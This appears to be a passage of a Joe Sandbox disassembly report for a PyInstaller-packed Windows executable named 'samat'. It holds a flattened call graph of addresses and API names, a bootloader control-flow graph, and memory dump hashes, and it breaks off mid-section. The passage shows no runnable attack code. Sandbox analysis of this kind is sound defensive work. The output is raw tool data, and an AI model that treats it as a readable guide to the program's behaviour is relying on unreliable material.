7ff7e12d4f08 _set_fmode 11 API calls 17327->17328 17329 7ff7e12d0d46 17328->17329 17331 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17329->17331 17332 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17330->17332 17338 7ff7e12d0d51 17331->17338 17332->17338 17334 7ff7e12d0e46 17333->17334 17336 7ff7e12d4f08 _set_fmode 11 API calls 17333->17336 17335 7ff7e12d4f08 _set_fmode 11 API calls 17334->17335 17334->17338 17337 7ff7e12d0ef0 17335->17337 17339 7ff7e12d0e3b 17336->17339 17340 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17337->17340 17338->17214 17341 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17339->17341 17340->17338 17341->17334 17346 7ff7e12dec3d 17342->17346 17343 7ff7e12dec42 17344 7ff7e12d51dd 17343->17344 17345 7ff7e12d4f08 _set_fmode 11 API calls 17343->17345 17344->17192 17344->17193 17347 7ff7e12dec4c 17345->17347 17346->17343 17346->17344 17349 7ff7e12dec8c 17346->17349 17348 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17347->17348 17348->17344 17349->17344 17350 7ff7e12d4f08 _set_fmode 11 API calls 17349->17350 17350->17347 17352 7ff7e12d8245 17351->17352 17353 7ff7e12d8258 17351->17353 17355 7ff7e12d4f08 _set_fmode 11 API calls 17352->17355 17361 7ff7e12d7ebc 17353->17361 17356 7ff7e12d824a 17355->17356 17358 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17356->17358 17359 7ff7e12d8256 17358->17359 17359->16485 17368 7ff7e12e02d8 EnterCriticalSection 17361->17368 17370 7ff7e12c85b1 GetTokenInformation 17369->17370 17372 7ff7e12c8633 __std_exception_copy 17369->17372 17371 7ff7e12c85d2 GetLastError 17370->17371 17373 7ff7e12c85dd 17370->17373 17371->17372 17371->17373 17374 7ff7e12c8646 CloseHandle 17372->17374 17375 7ff7e12c864c 17372->17375 17373->17372 17376 7ff7e12c85f9 GetTokenInformation 17373->17376 17374->17375 17375->16490 17376->17372 17377 7ff7e12c861c 17376->17377 17377->17372 17378 7ff7e12c8626 ConvertSidToStringSidW 17377->17378 17378->17372 17380 7ff7e12cc850 17379->17380 17381 7ff7e12c2b74 GetCurrentProcessId 17380->17381 17382 7ff7e12c26b0 48 API calls 17381->17382 17383 7ff7e12c2bc7 17382->17383 17384 7ff7e12d4bd8 48 API calls 17383->17384 17385 7ff7e12c2c10 MessageBoxW 17384->17385 17386 7ff7e12cc550 _log10_special 8 API calls 17385->17386 17387 7ff7e12c2c40 17386->17387 17387->16501 17389 7ff7e12c25e5 17388->17389 17390 7ff7e12d4bd8 48 API calls 17389->17390 17391 7ff7e12c2604 17390->17391 17391->16509 17427 7ff7e12d8794 17392->17427 17396 7ff7e12c81dc 17395->17396 17397 7ff7e12c9390 2 API calls 17396->17397 17398 7ff7e12c81fb 17397->17398 17399 7ff7e12c8203 17398->17399 17400 7ff7e12c8216 ExpandEnvironmentStringsW 17398->17400 17401 7ff7e12c2810 49 API calls 17399->17401 17402 7ff7e12c823c __std_exception_copy 17400->17402 17403 7ff7e12c820f __std_exception_copy 17401->17403 17404 7ff7e12c8253 17402->17404 17405 7ff7e12c8240 17402->17405 17407 7ff7e12cc550 _log10_special 8 API calls 17403->17407 17409 7ff7e12c82bf 17404->17409 17410 7ff7e12c8261 GetDriveTypeW 17404->17410 17406 7ff7e12c2810 49 API calls 17405->17406 17406->17403 17408 7ff7e12c83af 17407->17408 17408->16516 17408->16517 17565 7ff7e12d7e08 17409->17565 17414 7ff7e12c8295 17410->17414 17415 7ff7e12c82b0 17410->17415 17417 7ff7e12c2810 49 API calls 17414->17417 17558 7ff7e12d796c 17415->17558 17417->17403 17468 7ff7e12e1558 17427->17468 17527 7ff7e12e12d0 17468->17527 17548 7ff7e12e02d8 EnterCriticalSection 17527->17548 17566 7ff7e12d7e24 17565->17566 17567 7ff7e12d7e92 17565->17567 17566->17567 17667 7ff7e12c456a 17666->17667 17668 7ff7e12c9390 2 API calls 17667->17668 17669 7ff7e12c458f 17668->17669 17670 7ff7e12cc550 _log10_special 8 API calls 17669->17670 17671 7ff7e12c45b7 17670->17671 17671->16545 17673 7ff7e12c7e2e 17672->17673 17674 7ff7e12c7f52 17673->17674 17675 7ff7e12c1c80 49 API calls 17673->17675 17676 7ff7e12cc550 _log10_special 8 API calls 17674->17676 17680 7ff7e12c7eb5 17675->17680 17677 7ff7e12c7f83 17676->17677 17677->16545 17678 7ff7e12c1c80 49 API calls 17678->17680 17679 7ff7e12c4560 10 API calls 17679->17680 17680->17674 17680->17678 17680->17679 17681 7ff7e12c9390 2 API calls 17680->17681 17682 7ff7e12c7f23 CreateDirectoryW 17681->17682 17682->17674 17682->17680 17684 7ff7e12c1613 17683->17684 17685 7ff7e12c1637 17683->17685 17804 7ff7e12c1050 17684->17804 17687 7ff7e12c45c0 108 API calls 17685->17687 17688 7ff7e12c164b 17687->17688 17691 7ff7e12c1682 17688->17691 17692 7ff7e12c1653 17688->17692 17689 7ff7e12c162e 17689->16545 17690 7ff7e12c1618 17690->17689 17694 7ff7e12c2710 54 API calls 17690->17694 17693 7ff7e12c45c0 108 API calls 17691->17693 17695 7ff7e12d4f08 _set_fmode 11 API calls 17692->17695 17696 7ff7e12c1696 17693->17696 17694->17689 17697 7ff7e12c1658 17695->17697 17698 7ff7e12c16b8 17696->17698 17699 7ff7e12c169e 17696->17699 17700 7ff7e12c2910 54 API calls 17697->17700 17703 7ff7e12d06d4 73 API calls 17698->17703 17702 7ff7e12c2710 54 API calls 17699->17702 17701 7ff7e12c1671 17700->17701 17701->16545 17704 7ff7e12c16ae 17702->17704 17705 7ff7e12c16cd 17703->17705 17710 7ff7e12d004c 74 API calls 17704->17710 17706 7ff7e12c16d1 17705->17706 17707 7ff7e12c16f9 17705->17707 17711 7ff7e12d4f08 _set_fmode 11 API calls 17706->17711 17708 7ff7e12c16ff 17707->17708 17709 7ff7e12c1717 17707->17709 17713 7ff7e12c1829 17710->17713 17713->16545 17732 7ff7e12c718b 17731->17732 17734 7ff7e12c7144 17731->17734 17732->16545 17734->17732 17868 7ff7e12d5024 17734->17868 17736 7ff7e12c41a1 17735->17736 17737 7ff7e12c44e0 49 API calls 17736->17737 17738 7ff7e12c41db 17737->17738 17739 7ff7e12c44e0 49 API calls 17738->17739 17740 7ff7e12c41eb 17739->17740 17741 7ff7e12c420d 17740->17741 17742 7ff7e12c423c 17740->17742 17899 7ff7e12c4110 17741->17899 17744 7ff7e12c4110 51 API calls 17742->17744 17745 7ff7e12c423a 17744->17745 17746 7ff7e12c4267 17745->17746 17747 7ff7e12c429c 17745->17747 17906 7ff7e12c7cf0 17746->17906 17748 7ff7e12c4110 51 API calls 17747->17748 17751 7ff7e12c42c0 17748->17751 17753 7ff7e12c4110 51 API calls 17751->17753 17759 7ff7e12c4312 17751->17759 17780 7ff7e12c1c80 49 API calls 17779->17780 17781 7ff7e12c4474 17780->17781 17781->16545 17805 7ff7e12c45c0 108 API calls 17804->17805 17806 7ff7e12c108c 17805->17806 17807 7ff7e12c1094 17806->17807 17808 7ff7e12c10a9 17806->17808 17809 7ff7e12c2710 54 API calls 17807->17809 17810 7ff7e12d06d4 73 API calls 17808->17810 17816 7ff7e12c10a4 __std_exception_copy 17809->17816 17811 7ff7e12c10bf 17810->17811 17812 7ff7e12c10e6 17811->17812 17813 7ff7e12c10c3 17811->17813 17818 7ff7e12c1122 17812->17818 17819 7ff7e12c10f7 17812->17819 17814 7ff7e12d4f08 _set_fmode 11 API calls 17813->17814 17815 7ff7e12c10c8 17814->17815 17817 7ff7e12c2910 54 API calls 17815->17817 17816->17690 17824 7ff7e12c10e1 __std_exception_copy 17817->17824 17820 7ff7e12c1129 17818->17820 17829 7ff7e12c113c 17818->17829 17821 7ff7e12d4f08 _set_fmode 11 API calls 17819->17821 17823 7ff7e12c1210 92 API calls 17820->17823 17822 7ff7e12c1100 17821->17822 17823->17824 17828 7ff7e12d039c _fread_nolock 53 API calls 17828->17829 17829->17824 17829->17828 17831 7ff7e12c11ed 17829->17831 17869 7ff7e12d5031 17868->17869 17870 7ff7e12d505e 17868->17870 17871 7ff7e12d4f08 _set_fmode 11 API calls 17869->17871 17879 7ff7e12d4fe8 17869->17879 17872 7ff7e12d5081 17870->17872 17873 7ff7e12d509d 17870->17873 17874 7ff7e12d503b 17871->17874 17875 7ff7e12d4f08 _set_fmode 11 API calls 17872->17875 17883 7ff7e12d4f4c 17873->17883 17878 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17874->17878 17876 7ff7e12d5086 17875->17876 17880 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17876->17880 17881 7ff7e12d5046 17878->17881 17879->17734 17882 7ff7e12d5091 17880->17882 17881->17734 17882->17734 17884 7ff7e12d4f70 17883->17884 17885 7ff7e12d4f6b 17883->17885 17884->17885 17886 7ff7e12db150 _CreateFrameInfo 45 API calls 17884->17886 17885->17882 17887 7ff7e12d4f8b 17886->17887 17891 7ff7e12dd984 17887->17891 17892 7ff7e12dd999 17891->17892 17894 7ff7e12d4fae 17891->17894 17893 7ff7e12e3304 45 API calls 17892->17893 17892->17894 17893->17894 17895 7ff7e12dd9f0 17894->17895 17900 7ff7e12c4136 17899->17900 17901 7ff7e12d4984 49 API calls 17900->17901 17902 7ff7e12c415c 17901->17902 17903 7ff7e12c416d 17902->17903 17904 7ff7e12c4560 10 API calls 17902->17904 17903->17745 17907 7ff7e12c7d05 17906->17907 17963 7ff7e12d5ec8 17962->17963 17964 7ff7e12d5eee 17963->17964 17967 7ff7e12d5f21 17963->17967 17965 7ff7e12d4f08 _set_fmode 11 API calls 17964->17965 17966 7ff7e12d5ef3 17965->17966 17968 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17966->17968 17969 7ff7e12d5f34 17967->17969 17970 7ff7e12d5f27 17967->17970 17973 7ff7e12c4616 17968->17973 17981 7ff7e12dac28 17969->17981 17971 7ff7e12d4f08 _set_fmode 11 API calls 17970->17971 17971->17973 17973->16578 17994 7ff7e12e02d8 EnterCriticalSection 17981->17994 18354 7ff7e12d78f8 18353->18354 18357 7ff7e12d73d4 18354->18357 18356 7ff7e12d7911 18356->16588 18358 7ff7e12d73ef 18357->18358 18359 7ff7e12d741e 18357->18359 18360 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 18358->18360 18367 7ff7e12d546c EnterCriticalSection 18359->18367 18362 7ff7e12d740f 18360->18362 18362->18356 18369 7ff7e12cfe43 18368->18369 18370 7ff7e12cfe71 18368->18370 18371 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 18369->18371 18372 7ff7e12cfe63 18370->18372 18378 7ff7e12d546c EnterCriticalSection 18370->18378 18371->18372 18372->16592 18380 7ff7e12c45c0 108 API calls 18379->18380 18381 7ff7e12c1493 18380->18381 18382 7ff7e12c14bc 18381->18382 18383 7ff7e12c149b 18381->18383 18385 7ff7e12d06d4 73 API calls 18382->18385 18384 7ff7e12c2710 54 API calls 18383->18384 18386 7ff7e12c14ab 18384->18386 18387 7ff7e12c14d1 18385->18387 18386->16618 18388 7ff7e12c14d5 18387->18388 18389 7ff7e12c14f8 18387->18389 18390 7ff7e12d4f08 _set_fmode 11 API calls 18388->18390 18393 7ff7e12c1532 18389->18393 18394 7ff7e12c1508 18389->18394 18391 7ff7e12c14da 18390->18391 18396 7ff7e12c1538 18393->18396 18397 7ff7e12c154b 18393->18397 18395 7ff7e12d4f08 _set_fmode 11 API calls 18394->18395 18486 7ff7e12c6375 18485->18486 18487 7ff7e12c1c80 49 API calls 18486->18487 18488 7ff7e12c63b1 18487->18488 18489 7ff7e12c63ba 18488->18489 18490 7ff7e12c63dd 18488->18490 18491 7ff7e12c2710 54 API calls 18489->18491 18492 7ff7e12c4630 49 API calls 18490->18492 18508 7ff7e12c63d3 18491->18508 18494 7ff7e12c63f5 18492->18494 18493 7ff7e12c6413 18497 7ff7e12c4560 10 API calls 18493->18497 18494->18493 18496 7ff7e12c2710 54 API calls 18494->18496 18495 7ff7e12cc550 _log10_special 8 API calls 18498 7ff7e12c336e 18495->18498 18496->18493 18499 7ff7e12c641d 18497->18499 18498->16687 18516 7ff7e12c6500 18498->18516 18500 7ff7e12c642b 18499->18500 18501 7ff7e12c8e80 3 API calls 18499->18501 18502 7ff7e12c4630 49 API calls 18500->18502 18501->18500 18503 7ff7e12c6444 18502->18503 18508->18495 18665 7ff7e12c5400 18516->18665 18667 7ff7e12c542c 18665->18667 20131 7ff7e12e16b0 20142 7ff7e12e73e4 20131->20142 20143 7ff7e12e73f1 20142->20143 20144 7ff7e12da948 __free_lconv_num 11 API calls 20143->20144 20145 7ff7e12e740d 20143->20145 20144->20143 20146 7ff7e12da948 __free_lconv_num 11 API calls 20145->20146 20147 7ff7e12e16b9 20145->20147 20146->20145 20148 7ff7e12e02d8 EnterCriticalSection 20147->20148 19412 7ff7e12d5628 19413 7ff7e12d565f 19412->19413 19414 7ff7e12d5642 19412->19414 19413->19414 19416 7ff7e12d5672 CreateFileW 19413->19416 19415 7ff7e12d4ee8 _fread_nolock 11 API calls 19414->19415 19417 7ff7e12d5647 19415->19417 19418 7ff7e12d56a6 19416->19418 19419 7ff7e12d56dc 19416->19419 19421 7ff7e12d4f08 _set_fmode 11 API calls 19417->19421 19437 7ff7e12d577c GetFileType 19418->19437 19463 7ff7e12d5c04 19419->19463 19424 7ff7e12d564f 19421->19424 19428 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19424->19428 19426 7ff7e12d56e5 19432 7ff7e12d4e7c _fread_nolock 11 API calls 19426->19432 19427 7ff7e12d5710 19484 7ff7e12d59c4 19427->19484 19431 7ff7e12d565a 19428->19431 19429 7ff7e12d56d1 CloseHandle 19429->19431 19430 7ff7e12d56bb CloseHandle 19430->19431 19436 7ff7e12d56ef 19432->19436 19436->19431 19438 7ff7e12d5887 19437->19438 19439 7ff7e12d57ca 19437->19439 19441 7ff7e12d588f 19438->19441 19442 7ff7e12d58b1 19438->19442 19440 7ff7e12d57f6 GetFileInformationByHandle 19439->19440 19444 7ff7e12d5b00 21 API calls 19439->19444 19445 7ff7e12d581f 19440->19445 19446 7ff7e12d58a2 GetLastError 19440->19446 19441->19446 19447 7ff7e12d5893 19441->19447 19443 7ff7e12d58d4 PeekNamedPipe 19442->19443 19462 7ff7e12d5872 19442->19462 19443->19462 19448 7ff7e12d57e4 19444->19448 19449 7ff7e12d59c4 51 API calls 19445->19449 19451 7ff7e12d4e7c _fread_nolock 11 API calls 19446->19451 19450 7ff7e12d4f08 _set_fmode 11 API calls 19447->19450 19448->19440 19448->19462 19453 7ff7e12d582a 19449->19453 19450->19462 19451->19462 19452 7ff7e12cc550 _log10_special 8 API calls 19454 7ff7e12d56b4 19452->19454 19501 7ff7e12d5924 19453->19501 19454->19429 19454->19430 19457 7ff7e12d5924 10 API calls 19458 7ff7e12d5849 19457->19458 19459 7ff7e12d5924 10 API calls 19458->19459 19460 7ff7e12d585a 19459->19460 19461 7ff7e12d4f08 _set_fmode 11 API calls 19460->19461 19460->19462 19461->19462 19462->19452 19464 7ff7e12d5c3a 19463->19464 19465 7ff7e12d4f08 _set_fmode 11 API calls 19464->19465 19483 7ff7e12d5cd2 __std_exception_copy 19464->19483 19467 7ff7e12d5c4c 19465->19467 19466 7ff7e12cc550 _log10_special 8 API calls 19469 7ff7e12d56e1 19466->19469 19468 7ff7e12d4f08 _set_fmode 11 API calls 19467->19468 19470 7ff7e12d5c54 19468->19470 19469->19426 19469->19427 19471 7ff7e12d7e08 45 API calls 19470->19471 19472 7ff7e12d5c69 19471->19472 19473 7ff7e12d5c71 19472->19473 19474 7ff7e12d5c7b 19472->19474 19475 7ff7e12d4f08 _set_fmode 11 API calls 19473->19475 19476 7ff7e12d4f08 _set_fmode 11 API calls 19474->19476 19479 7ff7e12d5c76 19475->19479 19477 7ff7e12d5c80 19476->19477 19478 7ff7e12d4f08 _set_fmode 11 API calls 19477->19478 19477->19483 19480 7ff7e12d5c8a 19478->19480 19481 7ff7e12d5cc4 GetDriveTypeW 19479->19481 19479->19483 19482 7ff7e12d7e08 45 API calls 19480->19482 19481->19483 19482->19479 19483->19466 19486 7ff7e12d59ec 19484->19486 19485 7ff7e12d571d 19494 7ff7e12d5b00 19485->19494 19486->19485 19508 7ff7e12df724 19486->19508 19488 7ff7e12d5a80 19488->19485 19489 7ff7e12df724 51 API calls 19488->19489 19490 7ff7e12d5a93 19489->19490 19490->19485 19491 7ff7e12df724 51 API calls 19490->19491 19492 7ff7e12d5aa6 19491->19492 19492->19485 19493 7ff7e12df724 51 API calls 19492->19493 19493->19485 19495 7ff7e12d5b1a 19494->19495 19496 7ff7e12d5b51 19495->19496 19497 7ff7e12d5b2a 19495->19497 19498 7ff7e12df5b8 21 API calls 19496->19498 19499 7ff7e12d4e7c _fread_nolock 11 API calls 19497->19499 19500 7ff7e12d5b3a 19497->19500 19498->19500 19499->19500 19500->19436 19502 7ff7e12d5940 19501->19502 19503 7ff7e12d594d FileTimeToSystemTime 19501->19503 19502->19503 19504 7ff7e12d5948 19502->19504 19503->19504 19505 7ff7e12d5961 SystemTimeToTzSpecificLocalTime 19503->19505 19506 7ff7e12cc550 _log10_special 8 API calls 19504->19506 19505->19504 19507 7ff7e12d5839 19506->19507 19507->19457 19509 7ff7e12df731 19508->19509 19510 7ff7e12df755 19508->19510 19509->19510 19511 7ff7e12df736 19509->19511 19512 7ff7e12df78f 19510->19512 19515 7ff7e12df7ae 19510->19515 19513 7ff7e12d4f08 _set_fmode 11 API calls 19511->19513 19514 7ff7e12d4f08 _set_fmode 11 API calls 19512->19514 19516 7ff7e12df73b 19513->19516 19517 7ff7e12df794 19514->19517 19518 7ff7e12d4f4c 45 API calls 19515->19518 19519 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19516->19519 19520 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19517->19520 19522 7ff7e12df7bb 19518->19522 19521 7ff7e12df746 19519->19521 19523 7ff7e12df79f 19520->19523 19521->19488 19522->19523 19524 7ff7e12e04dc 51 API calls 19522->19524 19523->19488 19524->19522 20333 7ff7e12dc520 20344 7ff7e12e02d8 EnterCriticalSection 20333->20344 20503 7ff7e12d5410 20504 7ff7e12d541b 20503->20504 20512 7ff7e12df2a4 20504->20512 20525 7ff7e12e02d8 EnterCriticalSection 20512->20525 16122 7ff7e12df98c 16123 7ff7e12dfb7e 16122->16123 16126 7ff7e12df9ce _isindst 16122->16126 16124 7ff7e12d4f08 _set_fmode 11 API calls 16123->16124 16125 7ff7e12dfb6e 16124->16125 16127 7ff7e12cc550 _log10_special 8 API calls 16125->16127 16126->16123 16129 7ff7e12dfa4e _isindst 16126->16129 16128 7ff7e12dfb99 16127->16128 16143 7ff7e12e6194 16129->16143 16134 7ff7e12dfbaa 16136 7ff7e12da900 _isindst 17 API calls 16134->16136 16138 7ff7e12dfbbe 16136->16138 16141 7ff7e12dfaab 16141->16125 16167 7ff7e12e61d8 16141->16167 16144 7ff7e12e61a3 16143->16144 16145 7ff7e12dfa6c 16143->16145 16174 7ff7e12e02d8 EnterCriticalSection 16144->16174 16149 7ff7e12e5598 16145->16149 16150 7ff7e12e55a1 16149->16150 16154 7ff7e12dfa81 16149->16154 16151 7ff7e12d4f08 _set_fmode 11 API calls 16150->16151 16152 7ff7e12e55a6 16151->16152 16153 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 16152->16153 16153->16154 16154->16134 16155 7ff7e12e55c8 16154->16155 16156 7ff7e12e55d1 16155->16156 16158 7ff7e12dfa92 16155->16158 16157 7ff7e12d4f08 _set_fmode 11 API calls 16156->16157 16159 7ff7e12e55d6 16157->16159 16158->16134 16161 7ff7e12e55f8 16158->16161 16160 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 16159->16160 16160->16158 16162 7ff7e12e5601 16161->16162 16163 7ff7e12dfaa3 16161->16163 16164 7ff7e12d4f08 _set_fmode 11 API calls 16162->16164 16163->16134 16163->16141 16165 7ff7e12e5606 16164->16165 16166 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 16165->16166 16166->16163 16175 7ff7e12e02d8 EnterCriticalSection 16167->16175 20535 7ff7e12eadfe 20536 7ff7e12eae0d 20535->20536 20537 7ff7e12eae17 20535->20537 20539 7ff7e12e0338 LeaveCriticalSection 20536->20539 20379 7ff7e12ead69 20382 7ff7e12d5478 LeaveCriticalSection 20379->20382 20541 7ff7e12eabe3 20544 7ff7e12eabf3 20541->20544 20545 7ff7e12d5478 LeaveCriticalSection 20544->20545 15895 7ff7e12cbae0 15896 7ff7e12cbb0e 15895->15896 15897 7ff7e12cbaf5 15895->15897 15897->15896 15900 7ff7e12dd5fc 15897->15900 15901 7ff7e12dd647 15900->15901 15905 7ff7e12dd60b _set_fmode 15900->15905 15910 7ff7e12d4f08 15901->15910 15903 7ff7e12dd62e HeapAlloc 15904 7ff7e12cbb6e 15903->15904 15903->15905 15905->15901 15905->15903 15907 7ff7e12e3590 15905->15907 15913 7ff7e12e35d0 15907->15913 15919 7ff7e12db2c8 GetLastError 15910->15919 15912 7ff7e12d4f11 15912->15904 15918 7ff7e12e02d8 EnterCriticalSection 15913->15918 15920 7ff7e12db309 FlsSetValue 15919->15920 15925 7ff7e12db2ec 15919->15925 15921 7ff7e12db2f9 SetLastError 15920->15921 15922 7ff7e12db31b 15920->15922 15921->15912 15936 7ff7e12deb98 15922->15936 15925->15920 15925->15921 15927 7ff7e12db348 FlsSetValue 15930 7ff7e12db354 FlsSetValue 15927->15930 15931 7ff7e12db366 15927->15931 15928 7ff7e12db338 FlsSetValue 15929 7ff7e12db341 15928->15929 15945 7ff7e12da948 15929->15945 15930->15929 15951 7ff7e12daef4 15931->15951 15937 7ff7e12debb7 _set_fmode 15936->15937 15938 7ff7e12deba9 15936->15938 15939 7ff7e12debfa 15937->15939 15940 7ff7e12debde HeapAlloc 15937->15940 15944 7ff7e12e3590 _set_fmode 2 API calls 15937->15944 15938->15937 15938->15939 15942 7ff7e12d4f08 _set_fmode 10 API calls 15939->15942 15940->15937 15941 7ff7e12debf8 15940->15941 15943 7ff7e12db32a 15941->15943 15942->15943 15943->15927 15943->15928 15944->15937 15946 7ff7e12da94d RtlFreeHeap 15945->15946 15950 7ff7e12da97c 15945->15950 15947 7ff7e12da968 GetLastError 15946->15947 15946->15950 15948 7ff7e12da975 __free_lconv_num 15947->15948 15949 7ff7e12d4f08 _set_fmode 9 API calls 15948->15949 15949->15950 15950->15921 15956 7ff7e12dadcc 15951->15956 15968 7ff7e12e02d8 EnterCriticalSection 15956->15968 15970 7ff7e12d9961 15982 7ff7e12da3d8 15970->15982 15987 7ff7e12db150 GetLastError 15982->15987 15988 7ff7e12db174 FlsGetValue 15987->15988 15989 7ff7e12db191 FlsSetValue 15987->15989 15990 7ff7e12db18b 15988->15990 16006 7ff7e12db181 15988->16006 15991 7ff7e12db1a3 15989->15991 15989->16006 15990->15989 15993 7ff7e12deb98 _set_fmode 11 API calls 15991->15993 15992 7ff7e12db1fd SetLastError 15994 7ff7e12db21d 15992->15994 15995 7ff7e12da3e1 15992->15995 15996 7ff7e12db1b2 15993->15996 15997 7ff7e12da504 _CreateFrameInfo 38 API calls 15994->15997 16009 7ff7e12da504 15995->16009 15998 7ff7e12db1d0 FlsSetValue 15996->15998 15999 7ff7e12db1c0 FlsSetValue 15996->15999 16002 7ff7e12db222 15997->16002 16000 7ff7e12db1dc FlsSetValue 15998->16000 16001 7ff7e12db1ee 15998->16001 16003 7ff7e12db1c9 15999->16003 16000->16003 16004 7ff7e12daef4 _set_fmode 11 API calls 16001->16004 16005 7ff7e12da948 __free_lconv_num 11 API calls 16003->16005 16007 7ff7e12db1f6 16004->16007 16005->16006 16006->15992 16008 7ff7e12da948 __free_lconv_num 11 API calls 16007->16008 16008->15992 16018 7ff7e12e3650 16009->16018 16052 7ff7e12e3608 16018->16052 16057 7ff7e12e02d8 EnterCriticalSection 16052->16057

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 0 7ff7e12c89e0-7ff7e12c8b26 call 7ff7e12cc850 call 7ff7e12c9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7e12d53f0 call 7ff7e12da47c call 7ff7e12d871c call 7ff7e12d53f0 call 7ff7e12da47c call 7ff7e12d871c call 7ff7e12d53f0 call 7ff7e12da47c call 7ff7e12d871c GetCommandLineW CreateProcessW 23 7ff7e12c8b4d-7ff7e12c8b89 RegisterClassW 0->23 24 7ff7e12c8b28-7ff7e12c8b48 GetLastError call 7ff7e12c2c50 0->24 25 7ff7e12c8b91-7ff7e12c8be5 CreateWindowExW 23->25 26 7ff7e12c8b8b GetLastError 23->26 31 7ff7e12c8e39-7ff7e12c8e5f call 7ff7e12cc550 24->31 29 7ff7e12c8bef-7ff7e12c8bf4 ShowWindow 25->29 30 7ff7e12c8be7-7ff7e12c8bed GetLastError 25->30 26->25 32 7ff7e12c8bfa-7ff7e12c8c0a WaitForSingleObject 29->32 30->32 34 7ff7e12c8c0c 32->34 35 7ff7e12c8c88-7ff7e12c8c8f 32->35 37 7ff7e12c8c10-7ff7e12c8c13 34->37 38 7ff7e12c8c91-7ff7e12c8ca1 WaitForSingleObject 35->38 39 7ff7e12c8cd2-7ff7e12c8cd9 35->39 44 7ff7e12c8c15 GetLastError 37->44 45 7ff7e12c8c1b-7ff7e12c8c22 37->45 40 7ff7e12c8ca7-7ff7e12c8cb7 TerminateProcess 38->40 41 7ff7e12c8df8-7ff7e12c8e02 38->41 42 7ff7e12c8cdf-7ff7e12c8cf5 QueryPerformanceFrequency QueryPerformanceCounter 39->42 43 7ff7e12c8dc0-7ff7e12c8dd9 GetMessageW 39->43 48 7ff7e12c8cbf-7ff7e12c8ccd WaitForSingleObject 40->48 49 7ff7e12c8cb9 GetLastError 40->49 46 7ff7e12c8e04-7ff7e12c8e0a DestroyWindow 41->46 47 7ff7e12c8e11-7ff7e12c8e35 GetExitCodeProcess CloseHandle * 2 41->47 50 7ff7e12c8d00-7ff7e12c8d38 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff7e12c8def-7ff7e12c8df6 43->52 53 7ff7e12c8ddb-7ff7e12c8de9 TranslateMessage DispatchMessageW 43->53 44->45 45->38 51 7ff7e12c8c24-7ff7e12c8c41 PeekMessageW 45->51 46->47 47->31 48->41 49->48 54 7ff7e12c8d73-7ff7e12c8d7a 50->54 55 7ff7e12c8d3a 50->55 56 7ff7e12c8c43-7ff7e12c8c74 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff7e12c8c76-7ff7e12c8c86 WaitForSingleObject 51->57 52->41 52->43 53->52 54->43 59 7ff7e12c8d7c-7ff7e12c8da5 QueryPerformanceCounter 54->59 58 7ff7e12c8d40-7ff7e12c8d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->35 57->37 58->54 58->58 59->50 60 7ff7e12c8dab-7ff7e12c8db2 59->60 60->41 61 7ff7e12c8db4-7ff7e12c8db8 60->61 61->43
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                      • Instruction ID: eba343eb55c1bcdafe6450e80ed1054b3ccd7343653f69bfcc94d6bd62d1b3b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D17232B08A8286E711AF34EC563A9B768FF84758F808237DA5D87A94DFBCD144C711

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
